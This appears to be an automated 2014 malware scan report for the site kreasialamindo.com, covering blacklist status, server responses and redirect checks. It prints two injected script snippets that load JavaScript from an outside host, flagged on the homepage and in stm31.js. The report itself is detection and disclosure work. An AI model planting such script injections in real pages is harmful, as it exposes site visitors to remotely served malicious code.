Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kreasialamindo.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kreasialamindo.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.kreasialamindo.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 17 May 2014 09:03:00 GMT Location: http://kreasialamindo.com/ Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17 Content-Length: 234 Content-Type: text/html; charset=iso-8859-1 | clean |
http://kreasialamindo.com/ | 200 OK Content-Length: 3493 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.futaba-shinsa-a31.asia/zcxb3qbt.php?id=45710750"></script> | ||
http://s2.tracemyip.org/tracker/lgUrl.php?stlVar2=1103&rgtype=4684NR-IPIB&pidnVar2=57397&prtVar2=14&scvVar2=12 | 200 OK Content-Length: 13471 Content-Type: text/javascript | clean |
http://www.kreasialamindo.com/home.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 17 May 2014 09:03:03 GMT Location: http://kreasialamindo.com/home.php Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17 Content-Length: 242 Content-Type: text/html; charset=iso-8859-1 | clean |
http://kreasialamindo.com/home.php | 200 OK Content-Length: 8007 Content-Type: text/html | clean |
http://kreasialamindo.com/stm31.js | 200 OK Content-Length: 36904 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.futaba-shinsa-a31.asia/zcxb3qbt.php?id=45710752"></script>'); | ||
http://www.kreasialamindo.com/./ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 17 May 2014 09:03:10 GMT Location: http://kreasialamindo.com/ Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17 Content-Length: 234 Content-Type: text/html; charset=iso-8859-1 | clean |
http://kreasialamindo.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kreasialamindo.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 May 2014 09:03:01 GMT
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Content-Length: 3493
Content-Type: text/html
X-Powered-By: PHP/5.2.17
...3493 bytes of data.
GET / HTTP/1.1
Host: kreasialamindo.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 May 2014 09:03:01 GMT
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Content-Length: 3493
Content-Type: text/html
X-Powered-By: PHP/5.2.17
...3493 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kreasialamindo.com
Referer: http://www.google.com/search?q=kreasialamindo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kreasialamindo.com
Referer: http://www.google.com/search?q=kreasialamindo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.